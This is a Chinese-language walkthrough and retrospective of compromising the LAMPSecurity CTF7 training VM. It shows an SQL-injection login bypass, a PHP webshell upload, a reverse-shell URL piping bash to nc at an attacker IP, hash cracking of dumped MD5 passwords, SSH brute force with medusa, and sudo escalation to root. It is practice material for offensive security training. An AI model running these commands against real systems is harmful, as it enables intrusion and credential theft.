LAMP SecurityCTF7靶机 WP&复盘
这台靶机进入了一个思维误区,故复盘记录
资产很多,兔子洞也很多
其实不用先拿到apache再横向提权的
这个靶机sql注入漏洞很多而且各种各样,我当时先SQL注入dump了数据库,当时卡着是因为ssh旧算法kali不支持,所以ssh连不上,hydra也爆不出来
再加上资产很多,就觉得密码喷射的概率不大,感觉直接连ssh概率不大,就没有折腾了
在roundcude,smb上也浪费了一些时间
还有一点,就是最关键的brian用户的MD5密码没有爆出来,因为当时直接用sqlmap顺便给rockyou爆的,以后还是不能图方便,要用专业工具
这个靶机利用原理很简单,但是做起来并不很顺畅,感觉之后还是要多练这种资产多的机器
nmap扫描
端口扫描
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ nmap -sT --min-rate=10000 -p- 10.10.10.140 -oA nmapscan/ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 04:57 EDT
Nmap scan report for 10.10.10.140
Host is up (0.027s latency).
Not shown: 65497 filtered tcp ports (no-response), 29 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
901/tcp open samba-swat
5900/tcp closed vnc
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:56:23:07 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 23.90 seconds
开的服务有点多
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ port=$(cat nmapscan/ports.nmap|grep open | awk -F '/' '{print $1}'| paste -sd ',')
进行tcp详细扫描,然后判断渗透优先级
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ nmap -sT -sC -sV -O -p22,80,139,901,8080,10000 10.10.10.140 -oA nmapscan/detail
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 05:02 EDT
Nmap scan report for 10.10.10.140
Host is up (0.0017s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 41:8a:0d:5d:59:60:45:c4:c4:15:f3:8a:8d:c0:99:19 (DSA)
|_ 2048 66:fb:a3:b4:74:72:66:f4:92:73:8f:bf:61:ec:8b:35 (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_http-title: Mad Irish Hacking Academy
|_http-server-header: Apache/2.2.15 (CentOS)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
139/tcp open netbios-ssn Samba smbd 3.5.10-125.el6 (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
| http-auth:
| HTTP/1.0 401 Authorization Required\x0D
|_ Basic realm=SWAT
|_http-title: 401 Authorization Required
8080/tcp open http Apache httpd 2.2.15 ((CentOS))
|_http-server-header: Apache/2.2.15 (CentOS)
| http-title: Admin :: Mad Irish Hacking Academy
|_Requested resource was /login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
10000/tcp open http MiniServ 1.610 (Webmin httpd)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Login to Webmin
MAC Address: 00:0C:29:56:23:07 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router|storage-misc|media device|webcam
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X|5.X (97%), MikroTik RouterOS 7.X (91%), Drobo embedded (89%), Synology DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 - 3.13 (97%), Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 2.6.39 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.5.10-125.el6)
| Computer name: localhost
| NetBIOS computer name:
| Domain name:
| FQDN: localhost
|_ System time: 2025-08-25T03:06:47-04:00
|_clock-skew: mean: -21d23h55m41s, deviation: 2h49m44s, median: -22d01h55m43s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.28 seconds
smb是user级的,所以先不考虑
先看80,8080,10000
同时进行脚本扫描
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ nmap --script=vuln -p22,80,139,901,8080,10000 10.10.10.140 -oA nmapscan/vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 05:05 EDT
Nmap scan report for 10.10.10.140
Host is up (0.0010s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
| /webmail/: Mail folder
| /css/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
| /icons/: Potentially interesting folder w/ directory listing
| /img/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
| /inc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
|_ /webalizer/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
| Couldn't find a file-type field.
|
| Couldn't find a file-type field.
|
| Couldn't find a file-type field.
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.140
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.140:80/signup
| Form id: email
|_ Form action: /signup_scr
139/tcp open netbios-ssn
901/tcp open samba-swat
8080/tcp open http-proxy
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
|_ httponly flag not set
| http-enum:
| /login.php: Possible admin folder
| /phpmyadmin/: phpMyAdmin
| /docs/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
| /icons/: Potentially interesting folder w/ directory listing
|_ /inc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:56:23:07 (VMware)
Host script results:
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 121.85 seconds
在8080端口,使用万能sql注入1' or1=1-- -直接进入后台,并且发现http://10.10.10.140:8080/readings.php?id=1&op=edit可以直接上传文件,尝试利用
先尝试文件上传是否可以利用
先直接写一个木马
可以看到上传成功了
接下来爆破目录找一下上传位置,同时在看一下nmap脚本扫描中有没有什么有用的信息
中途发现如果重新编辑这个上传,会报错:
它的uploading上传到assets目录上,可以留意一下这个目录会不会是upload目录
找了找,在
果然找到了上传的php
这个地方,是在8080端口上传的php,却在80端口的目录下找到的文件
这种情况是合理的,以后多web服务需要考虑共享文件系统等情况
可以看到可以成功利用
接下来反弹shell
试了试,好像无法成功通过木马反弹,可能有一点限制
http://10.10.10.140/assets/muma.php?aaa=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/bash%20-i%202%3E&1|nc%2010.10.10.128%20443%20%3E/tmp/f
尝试直接上传反弹shell
直接上传可以利用:
bash-4.1$ cd home
cd home
bash-4.1$ ls
ls
alice brian bruce charles john julia leon michael neil ruby webdev
可以看到有很多用户
用户多的情况下,试试递归拿密码
没有用,看了下这些目录没有查看权限
还有很多线索没用上,之前在8080端口使用万能密码进去,说明有SQL注入
尝试拿数据库,里面或许有能用
也可以直接在初始shell里找找能不能直接登录数据库
先查找数据库配置文件
cat db.php
<?php
/**
* This file is part of the LAMPSecurity CTF 7
* http://sourceforge.net/projects/lampsecurity
* by Justin C. Klein Keane
*/
class DatabaseConnection {
public function __construct() {
$this->conn = mysql_connect('localhost', 'root', ''); // Change in prod
if (!$this->conn) die('Could not connect: ' . mysql_error());
mysql_select_db('website');
}
public function query($query) {
$result = mysql_query($query);
if (!$result) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $query;
die($message);
}
$retval = array();
while ($row = mysql_fetch_assoc($result)) $retval[] = $row;
return $retval;
}
}
function dbin($string) {
return mysql_real_escape_string($string);
}
$db = new DatabaseConnection();bash-4.1$
这里是空密码
bash-4.1$ mysql -u root
mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 9008
Server version: 5.1.66 Source distribution
Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| roundcube |
| website |
+--------------------+
4 rows in set (0.00 sec)
mysql> use website
use website
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables
show tables
-> ;
;
+-------------------+
| Tables_in_website |
+-------------------+
| contact |
| documents |
| hits |
| log |
| newsletter |
| payment |
| trainings |
| trainings_x_users |
| users |
+-------------------+
9 rows in set (0.00 sec)
mysql> use users;
use users;
ERROR 1049 (42000): Unknown database 'users'
mysql> select * from users;
select * from users;
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| username | password | is_admin | last_login | user_id | realname | profile |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 | 1 | 2012-12-19 11:30:54 | 3 | Brian Hershel | Brian is our technical brains behind the operations and a chief trainer. |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 | 1 | NULL | 4 | John Durham | |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 | 1 | NULL | 5 | Alice Wonder | |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 | 1 | NULL | 6 | Ruby Spinster | |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a | 1 | NULL | 7 | Leon Parnetta | |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 | 1 | NULL | 8 | Julia Fields | |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 | 0 | NULL | 9 | Michael Saint | |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e | 0 | NULL | 10 | Bruce Pottricks | |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 | 0 | NULL | 11 | Neil Felstein | |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf | 0 | NULL | 12 | Charles Adams | |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a | 0 | NULL | 36 | | |
| | d41d8cd98f00b204e9800998ecf8427e | 0 | NULL | 114 | | |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 | 0 | NULL | 113 | | |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
13 rows in set (0.00 sec)
这里SQL注入获取也一样
根据经验看起来是raw-md5试试爆破
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ cat mysql.txt | grep @ |awk -F ' ' '{print$2}' |awk -F '@' '{print $1}'
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ cat mysql.txt | grep @ |awk -F ' ' '{print$2}' |awk -F '@' '{print $1}'>u.txt
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ cat mysql.txt | grep @ |awk -F ' ' '{print $4}'
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ cat mysql.txt | grep @ |awk -F ' ' '{print $4}'>pass.txt
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
Using default input encoding: UTF-8
Loaded 12 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Remaining 4 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2025-09-16 07:59) 0g/s 7670Kp/s 7670Kc/s 30680KC/s fuckyooh21..*7¡Vamos!
Session completed.
注意,这里john破解完需要用命令展示结果
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ john --show --format=raw-md5 pass.txt
?:my2cents
?:turtles77
?:qwer1234
?:madrid
?:somepassword
?:chuck33
?:changeme
?:test
或者使用hashcat
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ hashcat -m 0 -a 0 pass.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen AI 9 HX 370 w/ Radeon 890M, 1435/2934 MB (512 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 12 digests; 12 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
ed2539fe892d2c52c42a440354e8e3d5:madrid
4cb9c8a8048fd02294477fcb1a41191a:changeme
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234
098f6bcd4621d373cade4e832627b4f6:test
b2a97bcecbd9336b98d59d9324dae5cf:chuck33
2146bf95e8929874fc63d54f50f1d2e3:turtles77
9c42a1346e333a770904b2a2b37fa7d3:somepassword
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ hydra -L u.txt -P p.txt ssh://10.10.10.140
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-16 08:10:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 108 login tries (l:12/p:9), ~7 tries per task
[DATA] attacking ssh://10.10.10.140:22/
[ERROR] could not connect to ssh://10.10.10.140:22 - kex error : no match for method mac algo client->server: server [hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96], client [hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512]
尝试hydra爆破的时候,又是算法不匹配的问题
这里需要简单做一个配置,然后换用medusa工具
在 ~/.ssh/config 里加上:
Host 10.10.10.140
HostKeyAlgorithms +ssh-rsa
PubkeyAcceptedKeyTypes +ssh-rsa
使用medusa工具,它的ssh模块调用openssh,可以继承~/.ssh/config的算法配置
然后再进行爆破
┌──(kali㉿kali)-[~/Redteam/VulnHub/ctf7/10.10.10.140]
└─$ medusa -h 10.10.10.140 -U users.txt -P cred.txt -M ssh
Medusa v2.3_rc1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
2025-09-08 11:02:55 ACCOUNT CHECK: [ssh] Host: 10.10.10.140 (1 of 1, 0 complete) User: brian (1 of 12, 0 complete) Password: madrid (1 of 8 complete)
2025-09-08 11:02:58 ACCOUNT CHECK: [ssh] Host: 10.10.10.140 (1 of 1, 0 complete) User: brian (1 of 12, 0 complete) Password: changeme (2 of 8 complete)
2025-09-08 11:03:00 ACCOUNT CHECK: [ssh] Host: 10.10.10.140 (1 of 1, 0 complete) User: brian (1 of 12, 0 complete) Password: qwer1234 (3 of 8 complete)
2025-09-08 11:03:02 ACCOUNT CHECK: [ssh] Host: 10.10.10.140 (1 of 1, 0 complete) User: brian (1 of 12, 0 complete) Password: test (4 of 8 complete)
2025-09-08 11:03:05 ACCOUNT CHECK: [ssh] Host: 10.10.10.140 (1 of 1, 0 complete) User: brian (1 of 12, 0 complete) Password: chuck33 (5 of 8 complete)
2025-09-08 11:03:07 ACCOUNT CHECK: [ssh] Host: 10.10.10.140 (1 of 1, 0 complete) User: brian (1 of 12, 0 complete) Password: turtles77 (6 of 8 complete)
2025-09-08 11:03:09 ACCOUNT CHECK: [ssh] Host: 10.10.10.140 (1 of 1, 0 complete) User: brian (1 of 12, 0 complete) Password: somepassword (7 of 8 complete)
2025-09-08 11:03:09 ACCOUNT CHECK: [ssh] Host: 10.10.10.140 (1 of 1, 0 complete) User: brian (1 of 12, 0 complete) Password: my2cents (8 of 8 complete)
2025-09-08 11:03:09 ACCOUNT FOUND: [ssh] Host: 10.10.10.140 User: brian Password: my2cents [SUCCESS]
有六个账号success
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ medusa -h 10.10.10.140 -U u.txt -P p.txt -M ssh | grep SUCCESS
2025-09-16 08:19:35 ACCOUNT FOUND: [ssh] Host: 10.10.10.140 User: brian Password: my2cents [SUCCESS]
2025-09-16 08:19:54 ACCOUNT FOUND: [ssh] Host: 10.10.10.140 User: alice Password: turtles77 [SUCCESS]
2025-09-16 08:20:15 ACCOUNT FOUND: [ssh] Host: 10.10.10.140 User: leon Password: qwer1234 [SUCCESS]
2025-09-16 08:20:22 ACCOUNT FOUND: [ssh] Host: 10.10.10.140 User: julia Password: madrid [SUCCESS]
2025-09-16 08:20:31 ACCOUNT FOUND: [ssh] Host: 10.10.10.140 User: michael Password: somepassword [SUCCESS]
2025-09-16 08:21:18 ACCOUNT FOUND: [ssh] Host: 10.10.10.140 User: charles Password: chuck33 [SUCCESS]
┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
└─$ ssh brian@10.10.10.140
brian@10.10.10.140's password:
[brian@localhost ~]$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for brian:
Matching Defaults entries for brian on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
_XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brian may run the following commands on this host:
(ALL) ALL
brian@localhost ~]$ sudo -i
[root@localhost ~]
end
浙公网安备 33010602011771号